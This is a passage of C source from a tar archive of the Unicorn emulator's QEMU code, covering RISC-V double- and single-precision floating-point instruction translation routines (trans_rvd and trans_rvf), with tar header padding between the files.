trans_fsub_d(DisasContext *ctx, arg_fsub_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fsub_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fmul_d(DisasContext *ctx, arg_fmul_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmul_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fdiv_d(DisasContext *ctx, arg_fdiv_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fdiv_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fsqrt_d(DisasContext *ctx, arg_fsqrt_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fsqrt_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); mark_fs_dirty(ctx); return true; } static bool trans_fsgnj_d(DisasContext *ctx, arg_fsgnj_d *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FMOV */ tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1]); } else { tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs1], 0, 63); } mark_fs_dirty(ctx); return true; } static bool trans_fsgnjn_d(DisasContext *ctx, arg_fsgnjn_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FNEG */ tcg_gen_xori_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], INT64_MIN); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs2]); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0, tcg_ctx->cpu_fpr[a->rs1], 0, 63); tcg_temp_free_i64(tcg_ctx, t0); } mark_fs_dirty(ctx); return true; } static bool trans_fsgnjx_d(DisasContext *ctx, arg_fsgnjx_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FABS */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], ~INT64_MIN); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs2], INT64_MIN); tcg_gen_xor_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], t0); tcg_temp_free_i64(tcg_ctx, t0); } mark_fs_dirty(ctx); return true; } static bool trans_fmin_d(DisasContext *ctx, arg_fmin_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_fmin_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fmax_d(DisasContext *ctx, arg_fmax_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_fmax_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_s_d(DisasContext *ctx, arg_fcvt_s_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_d(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_d_s(DisasContext *ctx, arg_fcvt_d_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); mark_fs_dirty(ctx); return true; } static bool trans_feq_d(DisasContext *ctx, arg_feq_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_feq_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_flt_d(DisasContext *ctx, arg_flt_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_flt_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fle_d(DisasContext *ctx, arg_fle_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_fle_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fclass_d(DisasContext *ctx, arg_fclass_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_fclass_d(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_w_d(DisasContext *ctx, arg_fcvt_w_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_w_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_wu_d(DisasContext *ctx, arg_fcvt_wu_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_wu_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_d_w(DisasContext *ctx, arg_fcvt_d_w *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_w(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_d_wu(DisasContext *ctx, arg_fcvt_d_wu *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_wu(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } #ifdef TARGET_RISCV64 static bool trans_fcvt_l_d(DisasContext *ctx, arg_fcvt_l_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_l_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_lu_d(DisasContext *ctx, arg_fcvt_lu_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_lu_d(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmv_x_d(DisasContext *ctx, arg_fmv_x_d *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_gpr(tcg_ctx, a->rd, tcg_ctx->cpu_fpr[a->rs1]); return true; } static bool trans_fcvt_d_l(DisasContext *ctx, arg_fcvt_d_l *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_l(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_d_lu(DisasContext *ctx, arg_fcvt_d_lu *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_d_lu(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } static bool trans_fmv_d_x(DisasContext *ctx, arg_fmv_d_x *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVD); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); tcg_gen_mov_tl(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } #endif ����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/riscv/insn_trans/trans_rvf.inc.c������������������������������������������0000664�0000000�0000000�00000032530�14675241067�0023670�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * RISC-V translation routines for the RV64F Standard Extension. * * Copyright (c) 2016-2017 Sagar Karandikar, sagark@eecs.berkeley.edu * Copyright (c) 2018 Peer Adelt, peer.adelt@hni.uni-paderborn.de * Bastian Koppelmann, kbastian@mail.uni-paderborn.de * * This program is free software; you can redistribute it and/or modify it * under the terms and conditions of the GNU General Public License, * version 2 or later, as published by the Free Software Foundation. * * This program is distributed in the hope it will be useful, but WITHOUT * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or * FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for * more details. * * You should have received a copy of the GNU General Public License along with * this program. If not, see <http://www.gnu.org/licenses/>. */ #define REQUIRE_FPU do {\ if (ctx->mstatus_fs == 0) \ return false; \ } while (0) static bool trans_flw(DisasContext *ctx, arg_flw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_ld_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0, ctx->mem_idx, MO_TEUL); /* RISC-V requires NaN-boxing of narrower width floating point values */ tcg_gen_ori_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rd], 0xffffffff00000000ULL); tcg_temp_free(tcg_ctx, t0); mark_fs_dirty(ctx); return true; } static bool trans_fsw(DisasContext *ctx, arg_fsw *a) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); tcg_gen_addi_tl(tcg_ctx, t0, t0, a->imm); tcg_gen_qemu_st_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rs2], t0, ctx->mem_idx, MO_TEUL); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmadd_s(DisasContext *ctx, arg_fmadd_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmadd_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fmsub_s(DisasContext *ctx, arg_fmsub_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmsub_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fnmsub_s(DisasContext *ctx, arg_fnmsub_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fnmsub_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fnmadd_s(DisasContext *ctx, arg_fnmadd_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fnmadd_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs3]); mark_fs_dirty(ctx); return true; } static bool trans_fadd_s(DisasContext *ctx, arg_fadd_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fadd_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fsub_s(DisasContext *ctx, arg_fsub_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fsub_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fmul_s(DisasContext *ctx, arg_fmul_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fmul_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fdiv_s(DisasContext *ctx, arg_fdiv_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fdiv_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fsqrt_s(DisasContext *ctx, arg_fsqrt_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_set_rm(ctx, a->rm); gen_helper_fsqrt_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); mark_fs_dirty(ctx); return true; } static bool trans_fsgnj_s(DisasContext *ctx, arg_fsgnj_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FMOV */ tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1]); } else { /* FSGNJ */ tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs2], tcg_ctx->cpu_fpr[a->rs1], 0, 31); } mark_fs_dirty(ctx); return true; } static bool trans_fsgnjn_s(DisasContext *ctx, arg_fsgnjn_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FNEG */ tcg_gen_xori_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], INT32_MIN); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_not_i64(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs2]); tcg_gen_deposit_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0, tcg_ctx->cpu_fpr[a->rs1], 0, 31); tcg_temp_free_i64(tcg_ctx, t0); } mark_fs_dirty(ctx); return true; } static bool trans_fsgnjx_s(DisasContext *ctx, arg_fsgnjx_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; if (a->rs1 == a->rs2) { /* FABS */ tcg_gen_andi_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], ~INT32_MIN); } else { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); tcg_gen_andi_i64(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs2], INT32_MIN); tcg_gen_xor_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_fpr[a->rs1], t0); tcg_temp_free_i64(tcg_ctx, t0); } mark_fs_dirty(ctx); return true; } static bool trans_fmin_s(DisasContext *ctx, arg_fmin_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_fmin_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fmax_s(DisasContext *ctx, arg_fmax_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; gen_helper_fmax_s(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); mark_fs_dirty(ctx); return true; } static bool trans_fcvt_w_s(DisasContext *ctx, arg_fcvt_w_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_w_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_wu_s(DisasContext *ctx, arg_fcvt_wu_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_wu_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmv_x_w(DisasContext *ctx, arg_fmv_x_w *a) { /* NOTE: This was FMV.X.S in an earlier version of the ISA spec! */ REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); #if defined(TARGET_RISCV64) tcg_gen_ext32s_tl(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs1]); #else tcg_gen_extrl_i64_i32(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs1]); #endif gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_feq_s(DisasContext *ctx, arg_feq_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_feq_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_flt_s(DisasContext *ctx, arg_flt_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_flt_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fle_s(DisasContext *ctx, arg_fle_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_fle_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1], tcg_ctx->cpu_fpr[a->rs2]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fclass_s(DisasContext *ctx, arg_fclass_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_helper_fclass_s(tcg_ctx, t0, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_s_w(DisasContext *ctx, arg_fcvt_s_w *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_w(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_s_wu(DisasContext *ctx, arg_fcvt_s_wu *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_wu(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fmv_w_x(DisasContext *ctx, arg_fmv_w_x *a) { /* NOTE: This was FMV.S.X in an earlier version of the ISA spec! */ REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); #if defined(TARGET_RISCV64) tcg_gen_mov_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0); #else tcg_gen_extu_i32_i64(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], t0); #endif mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } #ifdef TARGET_RISCV64 static bool trans_fcvt_l_s(DisasContext *ctx, arg_fcvt_l_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_l_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_lu_s(DisasContext *ctx, arg_fcvt_lu_s *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_set_rm(ctx, a->rm); gen_helper_fcvt_lu_s(tcg_ctx, t0, tcg_ctx->cpu_env, tcg_ctx->cpu_fpr[a->rs1]); gen_set_gpr(tcg_ctx, a->rd, t0); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_s_l(DisasContext *ctx, arg_fcvt_s_l *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_l(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } static bool trans_fcvt_s_lu(DisasContext *ctx, arg_fcvt_s_lu *a) { REQUIRE_FPU; REQUIRE_EXT(ctx, RVF); TCGContext *tcg_ctx = ctx->uc->tcg_ctx; TCGv t0 = tcg_temp_new(tcg_ctx); gen_get_gpr(tcg_ctx, t0, a->rs1); gen_set_rm(ctx, a->rm); gen_helper_fcvt_s_lu(tcg_ctx, tcg_ctx->cpu_fpr[a->rd], tcg_ctx->cpu_env, t0); mark_fs_dirty(ctx); tcg_temp_free(tcg_ctx, t0); return true; } #endif 